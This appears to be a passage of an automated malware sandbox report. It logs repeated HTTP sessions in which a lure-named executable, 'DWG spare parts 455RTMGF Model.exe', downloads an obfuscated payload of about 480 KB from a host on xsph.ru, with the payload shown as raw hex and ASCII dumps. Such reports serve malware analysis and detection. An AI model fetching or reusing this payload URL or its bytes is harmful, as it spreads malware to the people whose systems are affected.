                                                              Sep 16, 2022 17:08:49.877443075 CEST670INData Raw: d9 80 8a 31 bf 0f 60 ca 64 68 41 79 22 28 27 3f 38 2e db 23 6a 21 5c 6c b9 69 6d e3 31 9e 86 11 a5 c6 6e a7 b3 83 2e 8f e8 f0 83 1c 92 27 8f 36 26 25 8a c8 b1 bd 2b f3 3b c2 09 41 be bf b7 35 03 0b e7 31 a7 da f7 f6 4c 79 a3 da 44 6f 96 8b ff 44
                                                              Data Ascii: 1`dhAy"('?8.#j!\lim1n.'6&%+;A51LyDoDZ)^vlb5iJ;TDzv)"<Es=+0{t}i\DogJo-3m#fi)tj+r=xd:igq3?1"6`CnFnj'^\/Ar!j'
                                                              Sep 16, 2022 17:08:49.942672014 CEST671INData Raw: dd 38 ab ce 9f b7 af a9 03 78 62 d9 76 7b 22 62 20 6a ce f3 b4 b3 bd f6 d6 d3 cb 31 07 34 5e bb 24 22 a9 d6 b8 1b bd b7 84 3b 62 f6 74 e3 b0 72 74 41 dd 69 6c 0f a9 a7 b1 b5 9a 6e bb 94 d6 6e a9 af 76 b2 96 07 cd b9 6c 62 fd 76 7b 22 66 20 5e ce
                                                              Data Ascii: 8xbv{"b j14^$";btrtAilnnvlbv{"f ^qlp`p+?fbfrjAnZT@tbt1v3h 2j\YduOrjt!d+nZ&QhrHvv.:t#Avv+wx!t)?}+b{qj3


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              4192.168.2.749728141.8.192.15180C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Sep 16, 2022 17:08:49.980505943 CEST698OUTGET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: 62
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:50.049272060 CEST699INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:49 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes
                                                              Data Raw: 10 0a 59 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 ee cf ea 5a 60 62 66 72 76 74 68 76 c5 c5 a7 bb 5f b1 b5 68 72 bb bd 6e 93 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 68 ab 70 6a 68 c7 a0 bf 62 0a b5 e9 24 10 b9 41 f3 77 98 20 73 69 88 7d 32 7d 86 77 e3 71 96 cf d5 22 1c 79 7f 82 cd cd 98 32 24 1c 96 34 2e 7a 97 ee cb 86 7f 79 e1 c7 4c ab ad bd 22 bd 6e 78 64 70 6a 76 a5 0c a4 32 60 ef f5 7d 5e f3 e7 79 b1 9e b8 20 57 7c 92 32 66 eb e9 28 5d 8a 24 36 00 ac a6 85 10 90 69 79 b3 f7 b6 77 b3 06 84 67 c5 b2 f9 30 31 1a a7 36 74 eb b8 32 fc 31 9a 20 8c e7 e9 73 5b ee ae 1a 93 e7 eb 69 4f 27 eb 73 22 aa ae 1c c5 47 44 34 b1 f3 b6 1e 70 9e e7 1e 3e e7 f3 6b 4d dc a0 7f 92 ac e9 77 02 45 95 81 5a 03 9e 38 63 de a6 34 c3 aa a4 34 df 32 90 77 74 f3 05 73 b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 dd 8f bd 6e 3f 66 5a 76 76 a7 60 e5 b9 6c 62 74 c3 78 bb 5a 09 76 6c 74 bb a9 5e af 66 40 72 5a c1 ab 72 6e a7 bb bd 6e 0c 2a c1 6a 76 6a 5a b1 62 d9 b9 6a 74 68 93 78 78 b7 bb a7 b1 a7 68 72 78 bd c1 76 a9 af 76 bb 74 af 66 b9 6c 62 74 c3 78 0b af a9 76 6a bb 5a 66 70 af 66 bb b9 5a 41 b7 70 5e a7 bb ad 6e 78 64 70 5a 76 5a 6a b1 62 66 72 6a 74 78 76 78 78 a7 bb a7 b1 b5 68 72 bb 7a ac 70 a9 1f 76 bb b7 af 96 74 6c 77 89 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 fe 62 bb 49 56 78 64 60 57 70 5a 8f b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 12 63 af af 5e bb b7 af 54 0c 72 62 91 c3 78 bb 5a a9 76 76 bb 5a 66 70 af d9 6a b9 0e bd b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb 3c 1a db 7f 79 bb bd 6e f4 a3 5c 76 bb a7 af a9 b9 95 a9 74 c3 6c bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a e1 b7 70 d1 3c 32 86 84 7b 8e 70 6a dc 26 b5 b1 62 d9 b9 6a 74 6b b9 78 78 52 78 a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb 3a af a9 3c 97 d9 7e 30 7a bb 5a a9 9f d5 bb 5a 66 d0 a9 66 c1 a7 5a c1 b7 ac 78 a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 a3 72 6a b4 93 7d 83 2c a7 bb a7 b1 72 68 72 bb bd 8b bb a9 af 6c bb b7 af fb bf 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 8d af 66 01 4a 92 7c 7d d3 32 a7 bb 50 74 78 64 70 e5 bb 5a 5a ad 62 66 72 9e 6a 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 8b 76 a9 52 a5 32 83 1e e5 b9 6c 62 69 3e 78 bb 5a 96 bb 76 bb 2d 66 70 af b6 b7 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 87 76 5a 97 42 6b 90 81 2a 80 68 76 04 50 a7 bb a7 61 60 68 72 3c bd 6e 76 cb 5a 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a 4c 76 76 44 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7
                                                              Data Ascii: YgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQZ`bfrvthv_hrnvlbtxZvvZfpfZpnnhpjhb$Aw si}2}wq"y2$4.zyL"nxdpjv2`}^y W|2f(]$6iywg016t21 s[iO's"GD4p>kMwEZ8c442wtsbfrjthvxxhn?fZvv`lbtxZvlt^f@rZrnn*jvjZbjthxxhrxvvtflbtxvjZfpfZAp^nxdpZvZjbfrjtxvxxhrzpvtlwxZvvZfpfZpbIVxd`WpZbfrjthvxxhrc^TrbxZvvZfpjpnnxdpjvZZbfrjthvxx<yn\vtlZvvZfpfZp<2{pj&bjtkxxRxhrnvv:<~0zZZffZxnxdpjvZZbrj},rhrllbtxZvvZffJ|}2PtxdpZZbfrjhvxxhrvR2lbi>xZv-fpZpnnxdpvZBk*hvPa`hr<nvZvlbtxZLvvDZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxx
                                                              Sep 16, 2022 17:08:50.049290895 CEST700INData Raw: bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c
                                                              Data Ascii: hrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxNr#~v(ftvz@v#GvpqVbfDv=bfnLvrq#WJxm:d^fk%,dp}V
                                                              Sep 16, 2022 17:08:50.049309015 CEST702INData Raw: c3 a9 b9 7b bf 90 87 78 23 8c b9 b7 76 c9 f3 f1 95 1f 9d c1 21 06 98 76 70 79 80 df 91 6e d0 4a 60 c3 76 90 f3 26 30 7a 3e 6a cc 52 66 b9 78 dd b2 20 95 c9 4c 72 23 9b 5e b7 a9 e5 f7 2c a1 cb a5 b9 d4 30 64 6a 78 c9 f3 9e b6 09 48 5a be 79 86 a7
                                                              Data Ascii: {x#v!vpynJ`v&0z>jRfx Lr#^,0djxHZy.JpltnCk^{6Z,t vbN8v{"n\}gJ^fn9oEsn_Cd/siZSb/B&{l1LBZ|v3pz?&tp4;Vuh,
                                                              Sep 16, 2022 17:08:50.049360037 CEST703INData Raw: 27 3c 56 a1 87 b9 a7 77 5a 29 eb 0f c3 4e 6e 78 7e 29 e7 ce 4b 89 b1 62 27 c6 62 2f 99 67 6d 31 fb 94 0f f3 ab 68 72 2a cf 27 f3 11 94 a3 bb b7 00 ed 3e 42 62 91 0a b4 3c 54 a9 37 be c1 73 60 27 84 a2 46 8f 5a e2 ee 71 5e 0f 38 76 6e 78 94 cd 7e
                                                              Data Ascii: '<VwZ)Nnx~)Kb'b/gm1hr*'>Bb<T7s`'FZq^8vnx~/nf;|QNh3KUtH\I4Zl;NwXvZKdWxzwjvZkdhvxrP,3?d^^Hu5l^W1"'.A@(td94frj5<<V0~*?RH\}b/
                                                              Sep 16, 2022 17:08:50.049403906 CEST705INData Raw: b9 64 70 2b c6 3b fb f2 4e 62 dd d2 0a a9 76 78 c5 44 da aa 64 48 c0 c0 ab bd 6e d3 d0 72 8a 23 d7 70 a9 b9 7e cd 35 a6 d0 f9 b3 a9 76 2f b6 8a 92 29 bc 98 fb c5 5a 8c de 0f d6 3d c1 bd 6e 81 64 79 6a 2f ac c2 a6 60 66 72 2b aa e5 f7 81 78 5a 38
                                                              Data Ascii: dp+;NbvxDdHnr#p~5v/)Z=ndyj/`fr+xZ86nj l}b0ipvZpz?q Z8$vrvjv;Zr{tqfA'/lf"}blv/lrfrn%hdp,1FlA3Br\R-Vjvzv
                                                              Sep 16, 2022 17:08:50.049448013 CEST706INData Raw: ee c3 5a 6e ee 19 cd 41 ef 23 6e 74 76 a9 80 2f ed 1f 1c 5a 6c b9 43 ac 1b a0 c1 5a a9 b7 40 ab 3b 2f 71 bf c9 19 0a 68 c1 b7 29 8f 36 a7 cd cb aa 60 70 df 2f 25 c2 2f b1 b3 bf e5 35 a0 ce b0 6a a7 bb 88 f8 03 c0 44 70 70 bb 2f f1 07 57 c1 b7 af
                                                              Data Ascii: ZnA#ntv/ZlCZ@;/qh)6`p/%/5jDpp/Wuv4Z/"bflq )x}nnjthl%3m'-rw`nnDJpnP,n\QZyb1#h#\\`jx;^p?Zp|Z
                                                              Sep 16, 2022 17:08:50.049504995 CEST707INData Raw: ce 85 0f 62 5c e0 6c 48 8d 1a 6c a3 a3 38 6e b3 48 a3 77 78 ed 5e c1 e5 84 8c df 29 6d 36 af dc 11 90 bc 0e 6c c3 a7 3b ff ba 2f ba b7 c1 41 d5 69 60 ee 26 ee 9a 8f ed 48 b2 85 bf 8e d0 30 3d ca 34 7b f0 e7 d4 3a bc 76 c5 72 ef 8b 0f 2f a0 40 03
                                                              Data Ascii: b\lHl8nHwx^)m6l;/Ai`&H0=4{:vr/@rZZEd?pxn$0A#Hp\b}"!Zv1jv~)tko%'d)Pg)@={**5}fj8-v.!xn?l)vxEd!th
                                                              Sep 16, 2022 17:08:50.049592972 CEST709INData Raw: 3f 13 a7 b3 df f6 05 19 f0 25 74 6a 80 cb ee b8 cb 7a f9 c9 bd 81 67 62 3b ce 43 b4 ca e8 c4 b5 c3 31 b0 0f 26 1f 64 68 c7 33 ed 25 73 09 5c 62 2f 05 7a 9e d5 94 94 43 76 e2 1f 23 08 d6 c3 c3 da f7 be a5 cc b3 74 e0 2b 20 a7 29 be 0f 97 c6 bb c5
                                                              Data Ascii: ?%tjzgb;C1&dh3%s\b/zCv#t+ )+fr5lZ,x3%\j~z51lnn;tltnEhZmk^5Uj/3n?k.j;Zn}y)(d?+Z%)pD!
                                                              Sep 16, 2022 17:08:50.049659014 CEST710INData Raw: 6e dc 37 69 6c c1 eb 35 66 9f f8 b4 c9 ca 25 0f b5 c3 31 41 36 d7 66 b2 f6 5c 87 94 25 7b 19 5c 62 37 ff ab f6 58 28 64 43 74 a1 f9 72 f1 ee 87 67 b3 31 25 36 ab 2d d8 32 e1 38 b7 df 27 f9 23 79 0f c5 b1 f4 aa 7d cf 50 c2 1e 95 bf 81 6d 88 2f a6
                                                              Data Ascii: n7il5f%1A6f\%{\b7X(dCtrg1%6-28'#y}Pm/KZd1kt5J/5i5jFht'#2);g~99dyZ#?\/\b5#\~y?!j'"'A}d#dysA?i`#h32nN8-r5P-Zfp
                                                              Sep 16, 2022 17:08:50.049689054 CEST712INData Raw: d9 80 8a 31 bf 0f 60 ca 64 68 41 79 22 28 27 3f 38 2e db 23 6a 21 5c 6c b9 69 6d e3 31 9e 86 11 a5 c6 6e a7 b3 83 2e 8f e8 f0 83 1c 92 27 8f 36 26 25 8a c8 b1 bd 2b f3 3b c2 09 41 be bf b7 35 03 0b e7 31 a7 da f7 f6 4c 79 a3 da 44 6f 96 8b ff 44
                                                              Data Ascii: 1`dhAy"('?8.#j!\lim1n.'6&%+;A51LyDoDZ)^vlb5iJ;TDzv)"<Es=+0{t}i\DogJo-3m#fi)tj+r=xd:igq3?1"6`CnFnj'^\/Ar!j'
                                                              Sep 16, 2022 17:08:50.117511988 CEST713INData Raw: dd 38 ab ce 9f b7 af a9 03 78 62 d9 76 7b 22 62 20 6a ce f3 b4 b3 bd f6 d6 d3 cb 31 07 34 5e bb 24 22 a9 d6 b8 1b bd b7 84 3b 62 f6 74 e3 b0 72 74 41 dd 69 6c 0f a9 a7 b1 b5 9a 6e bb 94 d6 6e a9 af 76 b2 96 07 cd b9 6c 62 fd 76 7b 22 66 20 5e ce
                                                              Data Ascii: 8xbv{"b j14^$";btrtAilnnvlbv{"f ^qlp`p+?fbfrjAnZT@tbt1v3h 2j\YduOrjt!d+nZ&QhrHvv.:t#Avv+wx!t)?}+b{qj3


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              5192.168.2.749731141.8.192.15180C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Sep 16, 2022 17:08:58.134170055 CEST1225OUTGET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: lVali
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:58.198698044 CEST1226INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:58 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes
                                                              Data Raw: 10 0a 59 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 ee cf ea 5a 60 62 66 72 76 74 68 76 c5 c5 a7 bb 5f b1 b5 68 72 bb bd 6e 93 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 68 ab 70 6a 68 c7 a0 bf 62 0a b5 e9 24 10 b9 41 f3 77 98 20 73 69 88 7d 32 7d 86 77 e3 71 96 cf d5 22 1c 79 7f 82 cd cd 98 32 24 1c 96 34 2e 7a 97 ee cb 86 7f 79 e1 c7 4c ab ad bd 22 bd 6e 78 64 70 6a 76 a5 0c a4 32 60 ef f5 7d 5e f3 e7 79 b1 9e b8 20 57 7c 92 32 66 eb e9 28 5d 8a 24 36 00 ac a6 85 10 90 69 79 b3 f7 b6 77 b3 06 84 67 c5 b2 f9 30 31 1a a7 36 74 eb b8 32 fc 31 9a 20 8c e7 e9 73 5b ee ae 1a 93 e7 eb 69 4f 27 eb 73 22 aa ae 1c c5 47 44 34 b1 f3 b6 1e 70 9e e7 1e 3e e7 f3 6b 4d dc a0 7f 92 ac e9 77 02 45 95 81 5a 03 9e 38 63 de a6 34 c3 aa a4 34 df 32 90 77 74 f3 05 73 b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 dd 8f bd 6e 3f 66 5a 76 76 a7 60 e5 b9 6c 62 74 c3 78 bb 5a 09 76 6c 74 bb a9 5e af 66 40 72 5a c1 ab 72 6e a7 bb bd 6e 0c 2a c1 6a 76 6a 5a b1 62 d9 b9 6a 74 68 93 78 78 b7 bb a7 b1 a7 68 72 78 bd c1 76 a9 af 76 bb 74 af 66 b9 6c 62 74 c3 78 0b af a9 76 6a bb 5a 66 70 af 66 bb b9 5a 41 b7 70 5e a7 bb ad 6e 78 64 70 5a 76 5a 6a b1 62 66 72 6a 74 78 76 78 78 a7 bb a7 b1 b5 68 72 bb 7a ac 70 a9 1f 76 bb b7 af 96 74 6c 77 89 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 fe 62 bb 49 56 78 64 60 57 70 5a 8f b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 12 63 af af 5e bb b7 af 54 0c 72 62 91 c3 78 bb 5a a9 76 76 bb 5a 66 70 af d9 6a b9 0e bd b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb 3c 1a db 7f 79 bb bd 6e f4 a3 5c 76 bb a7 af a9 b9 95 a9 74 c3 6c bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a e1 b7 70 d1 3c 32 86 84 7b 8e 70 6a dc 26 b5 b1 62 d9 b9 6a 74 6b b9 78 78 52 78 a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb 3a af a9 3c 97 d9 7e 30 7a bb 5a a9 9f d5 bb 5a 66 d0 a9 66 c1 a7 5a c1 b7 ac 78 a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 a3 72 6a b4 93 7d 83 2c a7 bb a7 b1 72 68 72 bb bd 8b bb a9 af 6c bb b7 af fb bf 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 8d af 66 01 4a 92 7c 7d d3 32 a7 bb 50 74 78 64 70 e5 bb 5a 5a ad 62 66 72 9e 6a 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 8b 76 a9 52 a5 32 83 1e e5 b9 6c 62 69 3e 78 bb 5a 96 bb 76 bb 2d 66 70 af b6 b7 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 87 76 5a 97 42 6b 90 81 2a 80 68 76 04 50 a7 bb a7 61 60 68 72 3c bd 6e 76 cb 5a 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a 4c 76 76 44 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7
                                                              Data Ascii: YgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQZ`bfrvthv_hrnvlbtxZvvZfpfZpnnhpjhb$Aw si}2}wq"y2$4.zyL"nxdpjv2`}^y W|2f(]$6iywg016t21 s[iO's"GD4p>kMwEZ8c442wtsbfrjthvxxhn?fZvv`lbtxZvlt^f@rZrnn*jvjZbjthxxhrxvvtflbtxvjZfpfZAp^nxdpZvZjbfrjtxvxxhrzpvtlwxZvvZfpfZpbIVxd`WpZbfrjthvxxhrc^TrbxZvvZfpjpnnxdpjvZZbfrjthvxx<yn\vtlZvvZfpfZp<2{pj&bjtkxxRxhrnvv:<~0zZZffZxnxdpjvZZbrj},rhrllbtxZvvZffJ|}2PtxdpZZbfrjhvxxhrvR2lbi>xZv-fpZpnnxdpvZBk*hvPa`hr<nvZvlbtxZLvvDZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxx
                                                              Sep 16, 2022 17:08:58.198728085 CEST1228INData Raw: bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c
                                                              Data Ascii: hrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxNr#~v(ftvz@v#GvpqVbfDv=bfnLvrq#WJxm:d^fk%,dp}V
                                                              Sep 16, 2022 17:08:58.198753119 CEST1229INData Raw: c3 a9 b9 7b bf 90 87 78 23 8c b9 b7 76 c9 f3 f1 95 1f 9d c1 21 06 98 76 70 79 80 df 91 6e d0 4a 60 c3 76 90 f3 26 30 7a 3e 6a cc 52 66 b9 78 dd b2 20 95 c9 4c 72 23 9b 5e b7 a9 e5 f7 2c a1 cb a5 b9 d4 30 64 6a 78 c9 f3 9e b6 09 48 5a be 79 86 a7
                                                              Data Ascii: {x#v!vpynJ`v&0z>jRfx Lr#^,0djxHZy.JpltnCk^{6Z,t vbN8v{"n\}gJ^fn9oEsn_Cd/siZSb/B&{l1LBZ|v3pz?&tp4;Vuh,
                                                              Sep 16, 2022 17:08:58.198777914 CEST1230INData Raw: 27 3c 56 a1 87 b9 a7 77 5a 29 eb 0f c3 4e 6e 78 7e 29 e7 ce 4b 89 b1 62 27 c6 62 2f 99 67 6d 31 fb 94 0f f3 ab 68 72 2a cf 27 f3 11 94 a3 bb b7 00 ed 3e 42 62 91 0a b4 3c 54 a9 37 be c1 73 60 27 84 a2 46 8f 5a e2 ee 71 5e 0f 38 76 6e 78 94 cd 7e
                                                              Data Ascii: '<VwZ)Nnx~)Kb'b/gm1hr*'>Bb<T7s`'FZq^8vnx~/nf;|QNh3KUtH\I4Zl;NwXvZKdWxzwjvZkdhvxrP,3?d^^Hu5l^W1"'.A@(td94frj5<<V0~*?RH\}b/
                                                              Sep 16, 2022 17:08:58.198803902 CEST1232INData Raw: b9 64 70 2b c6 3b fb f2 4e 62 dd d2 0a a9 76 78 c5 44 da aa 64 48 c0 c0 ab bd 6e d3 d0 72 8a 23 d7 70 a9 b9 7e cd 35 a6 d0 f9 b3 a9 76 2f b6 8a 92 29 bc 98 fb c5 5a 8c de 0f d6 3d c1 bd 6e 81 64 79 6a 2f ac c2 a6 60 66 72 2b aa e5 f7 81 78 5a 38
                                                              Data Ascii: dp+;NbvxDdHnr#p~5v/)Z=ndyj/`fr+xZ86nj l}b0ipvZpz?q Z8$vrvjv;Zr{tqfA'/lf"}blv/lrfrn%hdp,1FlA3Br\R-Vjvzv
                                                              Sep 16, 2022 17:08:58.198828936 CEST1233INData Raw: ee c3 5a 6e ee 19 cd 41 ef 23 6e 74 76 a9 80 2f ed 1f 1c 5a 6c b9 43 ac 1b a0 c1 5a a9 b7 40 ab 3b 2f 71 bf c9 19 0a 68 c1 b7 29 8f 36 a7 cd cb aa 60 70 df 2f 25 c2 2f b1 b3 bf e5 35 a0 ce b0 6a a7 bb 88 f8 03 c0 44 70 70 bb 2f f1 07 57 c1 b7 af
                                                              Data Ascii: ZnA#ntv/ZlCZ@;/qh)6`p/%/5jDpp/Wuv4Z/"bflq )x}nnjthl%3m'-rw`nnDJpnP,n\QZyb1#h#\\`jx;^p?Zp|Z
                                                              Sep 16, 2022 17:08:58.198854923 CEST1235INData Raw: ce 85 0f 62 5c e0 6c 48 8d 1a 6c a3 a3 38 6e b3 48 a3 77 78 ed 5e c1 e5 84 8c df 29 6d 36 af dc 11 90 bc 0e 6c c3 a7 3b ff ba 2f ba b7 c1 41 d5 69 60 ee 26 ee 9a 8f ed 48 b2 85 bf 8e d0 30 3d ca 34 7b f0 e7 d4 3a bc 76 c5 72 ef 8b 0f 2f a0 40 03
                                                              Data Ascii: b\lHl8nHwx^)m6l;/Ai`&H0=4{:vr/@rZZEd?pxn$0A#Hp\b}"!Zv1jv~)tko%'d)Pg)@={**5}fj8-v.!xn?l)vxEd!th
                                                              Sep 16, 2022 17:08:58.198879004 CEST1236INData Raw: 3f 13 a7 b3 df f6 05 19 f0 25 74 6a 80 cb ee b8 cb 7a f9 c9 bd 81 67 62 3b ce 43 b4 ca e8 c4 b5 c3 31 b0 0f 26 1f 64 68 c7 33 ed 25 73 09 5c 62 2f 05 7a 9e d5 94 94 43 76 e2 1f 23 08 d6 c3 c3 da f7 be a5 cc b3 74 e0 2b 20 a7 29 be 0f 97 c6 bb c5
                                                              Data Ascii: ?%tjzgb;C1&dh3%s\b/zCv#t+ )+fr5lZ,x3%\j~z51lnn;tltnEhZmk^5Uj/3n?k.j;Zn}y)(d?+Z%)pD!
                                                              Sep 16, 2022 17:08:58.198904991 CEST1237INData Raw: 6e dc 37 69 6c c1 eb 35 66 9f f8 b4 c9 ca 25 0f b5 c3 31 41 36 d7 66 b2 f6 5c 87 94 25 7b 19 5c 62 37 ff ab f6 58 28 64 43 74 a1 f9 72 f1 ee 87 67 b3 31 25 36 ab 2d d8 32 e1 38 b7 df 27 f9 23 79 0f c5 b1 f4 aa 7d cf 50 c2 1e 95 bf 81 6d 88 2f a6
                                                              Data Ascii: n7il5f%1A6f\%{\b7X(dCtrg1%6-28'#y}Pm/KZd1kt5J/5i5jFht'#2);g~99dyZ#?\/\b5#\~y?!j'"'A}d#dysA?i`#h32nN8-r5P-Zfp
                                                              Sep 16, 2022 17:08:58.198930979 CEST1239INData Raw: d9 80 8a 31 bf 0f 60 ca 64 68 41 79 22 28 27 3f 38 2e db 23 6a 21 5c 6c b9 69 6d e3 31 9e 86 11 a5 c6 6e a7 b3 83 2e 8f e8 f0 83 1c 92 27 8f 36 26 25 8a c8 b1 bd 2b f3 3b c2 09 41 be bf b7 35 03 0b e7 31 a7 da f7 f6 4c 79 a3 da 44 6f 96 8b ff 44
                                                              Data Ascii: 1`dhAy"('?8.#j!\lim1n.'6&%+;A51LyDoDZ)^vlb5iJ;TDzv)"<Es=+0{t}i\DogJo-3m#fi)tj+r=xd:igq3?1"6`CnFnj'^\/Ar!j'
